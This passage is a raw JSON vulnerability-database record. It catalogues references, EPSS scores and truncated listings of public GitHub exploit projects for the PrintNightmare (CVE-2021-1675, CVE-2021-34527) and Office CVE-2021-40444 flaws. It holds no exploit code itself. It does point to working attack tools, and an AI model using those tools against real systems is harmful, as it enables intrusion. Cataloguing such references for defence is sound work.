"SMB_NT_MS21_JUN_5003635.NASL", "SMB_NT_MS21_JUN_5003637.NASL", "SMB_NT_MS21_JUN_5003638.NASL", "SMB_NT_MS21_JUN_5003646.NASL", "SMB_NT_MS21_JUN_5003681.NASL", "SMB_NT_MS21_JUN_5003687.NASL", "SMB_NT_MS21_JUN_5003694.NASL", "SMB_NT_MS21_JUN_5003695.NASL", "SMB_NT_MS21_JUN_5003697.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165214", "PACKETSTORM:167261", "PACKETSTORM:167317"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:12BC089A56EB28CFD168EC09B070733D", "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:830DE5B1B5EBB6AEE4B12EF66AD749F9", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "seebug", "idList": ["SSV:99276"]}, {"type": "talosblog", "idList": ["TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D"]}, {"type": "thn", "idList": ["THN:10A732F6ED612DC7431BDC9A3CEC3A29", "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:6428957E9DED493169A2E63839F98667", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:849B821D3503018DA38FAFFBC34DAEBB", "THN:8A60310AB796B7372A105B7C8811306B", "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "THN:9CE630030E0F3E3041E633E498244C8D", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:A52CF43B8B04C0A2F8413E17698F9308", "THN:BD014635C5F702379060A20290985162", "THN:C4188C7A44467E425407D33067C14094", "THN:CAFA6C5C5A34365636215CFD7679FD50", "THN:CF5E93184467C7B8F56A517CE724ABCF", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:E7762183A6F7B3DDB942D3F1F99748F6", "THN:EDD5C9F076596EB9D13D36268BDBFAD1", "THN:F35E41E26872B23A7F620C6D8F7E2334"]}, {"type": "threatpost", "idList": ["THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:4C8D995307A845304CF691725B2352A2", "THREATPOST:500777B41EEA368E3AC2A6AED65C4A25", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:827A7E3B49365A0E49A11A05A5A29192", "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:ADA9E95C8FD42722E783C74443148525", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:EED27183B3F49112A9E785EA56534781"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "zdt", "idList": ["1337DAY-ID-37126"]}]}, "score": {"value": 8.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0"]}, {"type": "avleonov", "idList": ["AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE"]}, {"type": "canvas", "idList": ["UTORRENT"]}, {"type": "cert", "idList": ["VU:131152", "VU:383432"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0465", "CPAI-2021-0554"]}, {"type": "cisa", "idList": ["CISA:367C27124C09604830E0725F5F3123F7", "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "CISA:6C836D217FB0329B2D68AD71789D1BB0", "CISA:C70D91615E3DC8B589B493118D474566"]}, {"type": "cve", "idList": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-40444"]}, {"type": "githubexploit", "idList": ["8B907536-B213-590D-81B9-32CF4A55322E"]}, {"type": "hivepro", "idList": ["HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5"]}, {"type": "kaspersky", "idList": ["KLA12198", "KLA12202", "KLA12213", "KLA12214", "KLA12277", "KLA12278"]}, {"type": "kitploit", "idList": ["KITPLOIT:1624142243530526923", "KITPLOIT:2590785192528609562", "KITPLOIT:3456474172768099634", "KITPLOIT:3697667464193804316", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:5187040326820919368", "KITPLOIT:5230148353750207837", "KITPLOIT:698315176468431184", "KITPLOIT:942518396640901655"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:3CC49021549439F95A2EDEB2029CF54E", "KREBS:409088FC2DFC219B74043104C2B672CC", "KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "MALWAREBYTES:DB34937B6474073D9444648D34438225", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-34527/"]}, {"type": "mmpc", "idList": ["MMPC:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1675", "MS:CVE-2021-34527", "MS:CVE-2021-40444"]}, {"type": "mskb", "idList": ["KB5004945"]}, {"type": "msrc", "idList": ["MSRC:239E65C8BEB88185329D9990C80B10DF", "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4"]}, {"type": "mssecure", "idList": ["MSSECURE:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_JUL_5004945.NASL", "SMB_NT_MS21_JUL_5004946.NASL", "SMB_NT_MS21_JUL_5004947.NASL", "SMB_NT_MS21_JUL_5004948.NASL", "SMB_NT_MS21_JUL_5004950.NASL", "SMB_NT_MS21_JUL_5004951.NASL", "SMB_NT_MS21_JUL_5004958.NASL", "SMB_NT_MS21_JUL_5004959.NASL", "SMB_NT_MS21_JUL_5004960.NASL", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165214"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:12BC089A56EB28CFD168EC09B070733D", "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:830DE5B1B5EBB6AEE4B12EF66AD749F9"]}, {"type": "seebug", "idList": ["SSV:99276"]}, {"type": "talosblog", "idList": ["TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D"]}, {"type": "thn", "idList": ["THN:10A732F6ED612DC7431BDC9A3CEC3A29", "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:6428957E9DED493169A2E63839F98667", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:9CE630030E0F3E3041E633E498244C8D", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:CAFA6C5C5A34365636215CFD7679FD50", "THN:CF5E93184467C7B8F56A517CE724ABCF", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:EDD5C9F076596EB9D13D36268BDBFAD1"]}, {"type": "threatpost", "idList": ["THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:EED27183B3F49112A9E785EA56534781"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE"]}, {"type": "zdt", "idList": ["1337DAY-ID-37126"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-1675", "epss": "0.968880000", "percentile": "0.994750000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34527", "epss": "0.970380000", "percentile": "0.995570000", "modified": "2023-03-17"}, {"cve": "CVE-2021-40444", "epss": "0.966120000", "percentile": "0.993300000", "modified": "2023-03-17"}], "vulnersScore": 8.7}, "_state": {"dependencies": 1659988328, "score": 1684011499, "epss": 1679159933}, "_internal": {"score_hash": "07b209753e74200331d03f78d32ec2cb"}}

{"githubexploit": [{"lastseen": "2021-12-10T15:34:05", "description": "# \u3016EXP\u3017Ladon CVE-2021-40444 Office\u6f0f\u6d1e\u590d\u73b0\n\n\n### \u6f0f\u6d1e\u6982\u8ff0\n\n\u5317\u4eac\u65f6\u95f49\u67088\u65e5\uff0c\u7eff\u76df\u79d1\u6280...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T17:10:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-40444"], "modified": "2021-11-15T04:16:33", "id": "FF761088-559C-5E71-A5CD-196D4E4571B8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:32:50", "description": "# PrintNightmare\n\nHere is a project that will help to fight agai...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-28T07:55:42", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-09-15T06:40:48", "id": "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:13", "description": "## Kritische Sicherheitsl\u00fccke\n### PrintNightmare CVE-2021-1675, ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T07:30:52", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-05T03:00:36", "id": "0263BC36-BEB1-519B-965B-52D9E6AB116F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-07T23:15:44", "description": "# CVE-2021-1675-LPE-EXP\n**Simple LPE Exploit of CVE-2021-1675** ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T09:00:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-07T15:32:16", "id": "64AAF745-D50D-575C-B3FF-A09072475502", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:59", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T12:10:43", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:06:09", "id": "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-24T00:25:23", "description": "# It Was All A Dream\n\nA [CVE-2021-34527](https://msrc.microsoft....", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-05T20:13:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-23T19:20:20", "id": "0BB19334-D311-5464-B40B-7B27A0AD8825", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:28:18", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-22T03:32:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-02-22T03:32:28", "id": "21F83D93-118D-50C7-A5C0-B2069237666E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T19:52:51", "description": "# CVE-2021-34527 - PrintNightmare LPE (PowerShell)\n\n> Caleb Stew...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T12:10:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-30T10:57:52", "id": "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T17:02:41", "description": "# PrintNightmare\n\nPython implementation for PrintNightmare (CVE-...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-26T13:53:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-27T13:10:07", "id": "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T17:02:43", "description": "= Print Nightmare \u5206\u6790\u62a5\u544a\n:imagesdir: Figures\n:toc:\n:icons: font\n:f...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-22T10:49:30", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-03-16T09:18:03", "id": "F1B229EB-2178-53B9-839E-BA0B916376A2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-15T19:32:13", "description": "# Local Privilege Escalation Edition of CVE-2021-1675/CVE-2021-3...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T09:47:13", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-03-15T16:19:02", "id": "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 